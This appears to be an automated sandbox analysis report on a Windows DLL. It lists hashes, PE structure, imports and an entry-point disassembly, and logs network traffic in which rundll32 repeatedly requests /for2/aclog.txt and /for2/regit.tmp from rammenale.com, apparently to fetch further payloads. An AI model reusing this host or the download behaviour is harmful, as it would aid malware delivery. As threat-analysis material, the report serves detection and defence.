              TrID:
              • Win32 Dynamic Link Library (generic) (1002004/3) 99.60%
              • Generic Win/DOS Executable (2004/3) 0.20%
              • DOS Executable Generic (2002/1) 0.20%
              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
              File name:QEydjQdRxs.dll
              File size:155'648 bytes
              MD5:71481f31ac558750937ef27dad2d0025
              SHA1:fa2010a283a723a0d2a68d6bc8b16389b36a3a04
              SHA256:b62c9168fcde444dbc3be1593e80747929dcf1a49cc6305b49456d68d0c49e71
              SHA512:2553ac889e82ba93d84645f8a569ab697129970dfd7c5d65a5807be650d91dc3ae43888c58f96d75e3894b1517b280e33d11a908e00b01d61b79cf7c4793f82f
              SSDEEP:3072:ttFxYcagk6lhWoXc+HFDXy6yw2oZe34eqfyUDEaMl1vb4:ttFGOrhWgcMVXuw2r4Orb4
              TLSH:39E38D06B180C076C6BF1A390934DB765F7EB5305F709D8F67944E7A9F302C1DA26A2A
              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......\K...*...*...*..SR...*..SR...*..SR...*..SR...*...*..{*.......*.......*..SR...*......>*..u....*..u....*..u....*..u....*..Rich.*.
              Icon Hash:7ae282899bbab082
              Entrypoint:0x10004e89
              Entrypoint Section:.text
              Digitally signed:false
              Imagebase:0x10000000
              Subsystem:windows gui
              Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE, DLL
              DLL Characteristics:DYNAMIC_BASE, NX_COMPAT
              Time Stamp:0x65C149B1 [Mon Feb 5 20:48:49 2024 UTC]
              TLS Callbacks:
              CLR (.Net) Version:
              OS Version Major:6
              OS Version Minor:0
              File Version Major:6
              File Version Minor:0
              Subsystem Version Major:6
              Subsystem Version Minor:0
              Import Hash:5bcfc08c844c0007f9be93f5c47313c6
              Instruction
              push ebp
              mov ebp, esp
              cmp dword ptr [ebp+0Ch], 01h
              jne 00007F27887F0897h
              call 00007F27887F0A88h
              push dword ptr [ebp+10h]
              push dword ptr [ebp+0Ch]
              push dword ptr [ebp+08h]
              call 00007F27887F0743h
              add esp, 0Ch
              pop ebp
              retn 000Ch
              retn 0000h
              int3
              push ecx
              lea ecx, dword ptr [esp+08h]
              sub ecx, eax
              and ecx, 0Fh
              add eax, ecx
              sbb ecx, ecx
              or eax, ecx
              pop ecx
              jmp 00007F27887F0F8Fh
              push ecx
              lea ecx, dword ptr [esp+08h]
              sub ecx, eax
              and ecx, 07h
              add eax, ecx
              sbb ecx, ecx
              or eax, ecx
              pop ecx
              jmp 00007F27887F0F79h
              push ebp
              mov ebp, esp
              push 00000000h
              call dword ptr [1001D05Ch]
              push dword ptr [ebp+08h]
              call dword ptr [1001D058h]
              push C0000409h
              call dword ptr [1001D060h]
              push eax
              call dword ptr [1001D030h]
              pop ebp
              ret
              push ebp
              mov ebp, esp
              sub esp, 00000324h
              push 00000017h
              call dword ptr [1001D064h]
              test eax, eax
              je 00007F27887F0897h
              push 00000002h
              pop ecx
              int 29h
              mov dword ptr [10026BA0h], eax
              mov dword ptr [10026B9Ch], ecx
              mov dword ptr [10026B98h], edx
              mov dword ptr [10026B94h], ebx
              mov dword ptr [10026B90h], esi
              mov dword ptr [10026B8Ch], edi
              mov word ptr [10026BB8h], ss
              mov word ptr [10026BACh], cs
              mov word ptr [eax], es
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x24930 | 0x50 | .rdata
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x24980 | 0x50 | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x28000 | 0x1b0 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x29000 | 0x13d4 | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x235e0 | 0x40 | .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x1b7eb | 0x1b800 | b5ebfcec47bdbde0b0862430d977a874 | False | 0.5669921875 | data | 6.615728746259108 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x1d000 | 0x80da | 0x8200 | 19311fbfbd3de480b77edfe21900099e | False | 0.4551081730769231 | data | 5.28007570851873 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0x26000 | 0x1518 | 0xc00 | e0fc4326df3ced7a83183b7950ccd3cb | False | 0.16276041666666666 | data | 2.421179338341947 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x28000 | 0x1b0 | 0x200 | c6f9c221f82fb7b111e9efd08d831664 | False | 0.501953125 | data | 4.488394384042509 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x29000 | 0x13d4 | 0x1400 | 761cd4118d957c1fbec2a8aa8f578464 | False | 0.7701171875 | data | 6.5210110696497425 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_MANIFEST | 0x28060 | 0x14e | XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators | English | United States | 0.6407185628742516
DLL | Import
KERNEL32.DLL | FreeLibrary, WriteConsoleW, SetEndOfFile, HeapReAlloc, HeapSize, CreateFileW, FlushFileBuffers, GetStringTypeW, SetStdHandle, GetProcessHeap, ExitProcess, ExpandEnvironmentStringsW, TerminateProcess, CloseHandle, GetProcAddress, CreateProcessW, GetModuleHandleW, CopyFileW, GetEnvironmentVariableW, Sleep, LocalFree, GetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, IsProcessorFeaturePresent, QueryPerformanceCounter, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, IsDebuggerPresent, GetStartupInfoW, FreeEnvironmentStringsW, RtlUnwind, RaiseException, InterlockedFlushSList, SetLastError, EncodePointer, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, DecodePointer, LoadLibraryExW, ReadFile, GetModuleHandleExW, GetModuleFileNameW, SetFilePointerEx, GetConsoleMode, ReadConsoleW, GetStdHandle, GetFileType, HeapFree, HeapAlloc, LCMapStringW, WriteFile, GetConsoleOutputCP, GetFileSizeEx, FindClose, FindFirstFileExW, FindNextFileW, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, GetCommandLineA, GetCommandLineW, MultiByteToWideChar, WideCharToMultiByte, GetEnvironmentStringsW
ole32.dll | CoCreateInstance, CoUninitialize, CoInitialize
OLEAUT32.dll | VariantClear, VariantInit, SysFreeString, SysAllocString
Name | Ordinal | Address
mydllmain | 1 | 0x10001026
Language of compilation system | Country where language is spoken
English | United States
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Aug 29, 2024 06:53:00.995357037 CEST | 49834 | 53 | 192.168.2.5 | 1.1.1.1
Aug 29, 2024 06:53:01.276679039 CEST | 53 | 49834 | 1.1.1.1 | 192.168.2.5
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Aug 29, 2024 06:53:00.995357037 CEST | 192.168.2.5 | 1.1.1.1 | 0x689e | Standard query (0) | rammenale.com | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Aug 29, 2024 06:53:01.276679039 CEST | 1.1.1.1 | 192.168.2.5 | 0x689e | No error (0) | rammenale.com | | 131.153.206.231 | A (IP address) | IN (0x0001) | false
• rammenale.com
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.5 | 49706 | 131.153.206.231 | 443 | 1992 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | Bytes transferred | Direction | Data
2024-08-29 04:53:02 UTC | 287 | OUT | GET /for2/aclog.txt HTTP/1.1
              Accept: */*
              Accept-Encoding: gzip, deflate
              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
              Host: rammenale.com
              Connection: Keep-Alive
2024-08-29 04:53:02 UTC | 416 | IN | HTTP/1.1 404 Not Found
              Connection: close
              cache-control: private, no-cache, no-store, must-revalidate, max-age=0
              pragma: no-cache
              content-type: text/html
              content-length: 1251
              date: Thu, 29 Aug 2024 04:53:02 GMT
              server: LiteSpeed
              alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
2024-08-29 04:53:02 UTC | 952 | IN | Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</sty
2024-08-29 04:53:02 UTC | 299 | IN | Data Ascii: -top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.5 | 49708 | 131.153.206.231 | 443 | 2148 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | Bytes transferred | Direction | Data
2024-08-29 04:53:02 UTC | 287 | OUT | GET /for2/regit.tmp HTTP/1.1
              Accept: */*
              Accept-Encoding: gzip, deflate
              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
              Host: rammenale.com
              Connection: Keep-Alive
              2024-08-29 04:53:02 UTC | 416 | IN | HTTP/1.1 404 Not Found
              Connection: close
              cache-control: private, no-cache, no-store, must-revalidate, max-age=0
              pragma: no-cache
              content-type: text/html
              content-length: 1251
              date: Thu, 29 Aug 2024 04:53:02 GMT
              server: LiteSpeed
              alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
              2024-08-29 04:53:02 UTC | 952 | IN | Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79
              Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</sty
              2024-08-29 04:53:02 UTC | 299 | IN | Data Raw: 2d 74 6f 70 3a 20 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 35 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 30 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 30 2e 33 29 20 69 6e 73 65 74 3b 22 3e 0a 3c 62 72 3e 50 72 6f 75 64 6c 79 20 70 6f 77 65 72 65 64 20 62 79 20 4c 69 74 65 53 70 65 65 64 20 57 65 62 20 53 65 72 76 65 72 3c 70 3e 50 6c 65 61 73 65 20 62 65 20 61 64 76 69 73 65 64 20 74 68 61 74 20 4c 69 74 65 53 70 65 65 64 20 54 65 63 68 6e 6f 6c 6f 67 69 65 73 20 49 6e 63 2e 20 69 73 20 6e 6f 74 20 61 20 77 65 62 20 68 6f 73 74 69 6e 67 20 63 6f 6d 70 61 6e 79 20 61 6e 64 2c 20 61 73 20 73 75 63 68 2c 20 68 61 73 20 6e 6f 20 63 6f 6e 74 72 6f 6c 20 6f 76 65 72 20 63 6f 6e 74 65 6e 74 20
              Data Ascii: -top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content


              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
              2 | 192.168.2.5 | 49707 | 131.153.206.231 | 443 | 1732 | C:\Windows\SysWOW64\rundll32.exe
              Timestamp | Bytes transferred | Direction | Data
              2024-08-29 04:53:02 UTC | 287 | OUT | GET /for2/regit.tmp HTTP/1.1
              Accept: */*
              Accept-Encoding: gzip, deflate
              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
              Host: rammenale.com
              Connection: Keep-Alive
              2024-08-29 04:53:02 UTC | 416 | IN | HTTP/1.1 404 Not Found
              Connection: close
              cache-control: private, no-cache, no-store, must-revalidate, max-age=0
              pragma: no-cache
              content-type: text/html
              content-length: 1251
              date: Thu, 29 Aug 2024 04:53:02 GMT
              server: LiteSpeed
              alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
              2024-08-29 04:53:02 UTC | 952 | IN | Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79
              Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</sty
              2024-08-29 04:53:02 UTC | 299 | IN | Data Raw: 2d 74 6f 70 3a 20 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 35 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 30 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 30 2e 33 29 20 69 6e 73 65 74 3b 22 3e 0a 3c 62 72 3e 50 72 6f 75 64 6c 79 20 70 6f 77 65 72 65 64 20 62 79 20 4c 69 74 65 53 70 65 65 64 20 57 65 62 20 53 65 72 76 65 72 3c 70 3e 50 6c 65 61 73 65 20 62 65 20 61 64 76 69 73 65 64 20 74 68 61 74 20 4c 69 74 65 53 70 65 65 64 20 54 65 63 68 6e 6f 6c 6f 67 69 65 73 20 49 6e 63 2e 20 69 73 20 6e 6f 74 20 61 20 77 65 62 20 68 6f 73 74 69 6e 67 20 63 6f 6d 70 61 6e 79 20 61 6e 64 2c 20 61 73 20 73 75 63 68 2c 20 68 61 73 20 6e 6f 20 63 6f 6e 74 72 6f 6c 20 6f 76 65 72 20 63 6f 6e 74 65 6e 74 20
              Data Ascii: -top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content


              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
              3 | 192.168.2.5 | 49705 | 131.153.206.231 | 443 | 5260 | C:\Windows\SysWOW64\rundll32.exe
              Timestamp | Bytes transferred | Direction | Data
              2024-08-29 04:53:02 UTC | 287 | OUT | GET /for2/aclog.txt HTTP/1.1
              Accept: */*
              Accept-Encoding: gzip, deflate
              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
              Host: rammenale.com
              Connection: Keep-Alive
              2024-08-29 04:53:02 UTC | 416 | IN | HTTP/1.1 404 Not Found
              Connection: close
              cache-control: private, no-cache, no-store, must-revalidate, max-age=0
              pragma: no-cache
              content-type: text/html
              content-length: 1251
              date: Thu, 29 Aug 2024 04:53:02 GMT
              server: LiteSpeed
              alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
              2024-08-29 04:53:02 UTC | 952 | IN | Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79
              Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</sty
              2024-08-29 04:53:02 UTC | 299 | IN | Data Raw: 2d 74 6f 70 3a 20 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 35 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 30 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 30 2e 33 29 20 69 6e 73 65 74 3b 22 3e 0a 3c 62 72 3e 50 72 6f 75 64 6c 79 20 70 6f 77 65 72 65 64 20 62 79 20 4c 69 74 65 53 70 65 65 64 20 57 65 62 20 53 65 72 76 65 72 3c 70 3e 50 6c 65 61 73 65 20 62 65 20 61 64 76 69 73 65 64 20 74 68 61 74 20 4c 69 74 65 53 70 65 65 64 20 54 65 63 68 6e 6f 6c 6f 67 69 65 73 20 49 6e 63 2e 20 69 73 20 6e 6f 74 20 61 20 77 65 62 20 68 6f 73 74 69 6e 67 20 63 6f 6d 70 61 6e 79 20 61 6e 64 2c 20 61 73 20 73 75 63 68 2c 20 68 61 73 20 6e 6f 20 63 6f 6e 74 72 6f 6c 20 6f 76 65 72 20 63 6f 6e 74 65 6e 74 20
              Data Ascii: -top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content


              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
              4 | 192.168.2.5 | 49711 | 131.153.206.231 | 443 | 5428 | C:\Windows\SysWOW64\rundll32.exe
              Timestamp | Bytes transferred | Direction | Data
              2024-08-29 04:53:04 UTC | 287 | OUT | GET /for2/regit.tmp HTTP/1.1
              Accept: */*
              Accept-Encoding: gzip, deflate
              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
              Host: rammenale.com
              Connection: Keep-Alive
              2024-08-29 04:53:04 UTC | 416 | IN | HTTP/1.1 404 Not Found
              Connection: close
              cache-control: private, no-cache, no-store, must-revalidate, max-age=0
              pragma: no-cache
              content-type: text/html
              content-length: 1251
              date: Thu, 29 Aug 2024 04:53:04 GMT
              server: LiteSpeed
              alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
              2024-08-29 04:53:04 UTC | 952 | IN | Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79
              Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</sty
              2024-08-29 04:53:04 UTC | 299 | IN | Data Raw: 2d 74 6f 70 3a 20 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 35 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 30 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 30 2e 33 29 20 69 6e 73 65 74 3b 22 3e 0a 3c 62 72 3e 50 72 6f 75 64 6c 79 20 70 6f 77 65 72 65 64 20 62 79 20 4c 69 74 65 53 70 65 65 64 20 57 65 62 20 53 65 72 76 65 72 3c 70 3e 50 6c 65 61 73 65 20 62 65 20 61 64 76 69 73 65 64 20 74 68 61 74 20 4c 69 74 65 53 70 65 65 64 20 54 65 63 68 6e 6f 6c 6f 67 69 65 73 20 49 6e 63 2e 20 69 73 20 6e 6f 74 20 61 20 77 65 62 20 68 6f 73 74 69 6e 67 20 63 6f 6d 70 61 6e 79 20 61 6e 64 2c 20 61 73 20 73 75 63 68 2c 20 68 61 73 20 6e 6f 20 63 6f 6e 74 72 6f 6c 20 6f 76 65 72 20 63 6f 6e 74 65 6e 74 20
              Data Ascii: -top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content


              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
              5 | 192.168.2.5 | 49712 | 131.153.206.231 | 443 | 5440 | C:\Windows\SysWOW64\rundll32.exe
              Timestamp | Bytes transferred | Direction | Data
              2024-08-29 04:53:04 UTC | 287 | OUT | GET /for2/aclog.txt HTTP/1.1
              Accept: */*
              Accept-Encoding: gzip, deflate
              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
              Host: rammenale.com
              Connection: Keep-Alive
              2024-08-29 04:53:04 UTC | 416 | IN | HTTP/1.1 404 Not Found
              Connection: close
              cache-control: private, no-cache, no-store, must-revalidate, max-age=0
              pragma: no-cache
              content-type: text/html
              content-length: 1251
              date: Thu, 29 Aug 2024 04:53:04 GMT
              server: LiteSpeed
              alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
              2024-08-29 04:53:04 UTC | 952 | IN | Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79
              Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</sty
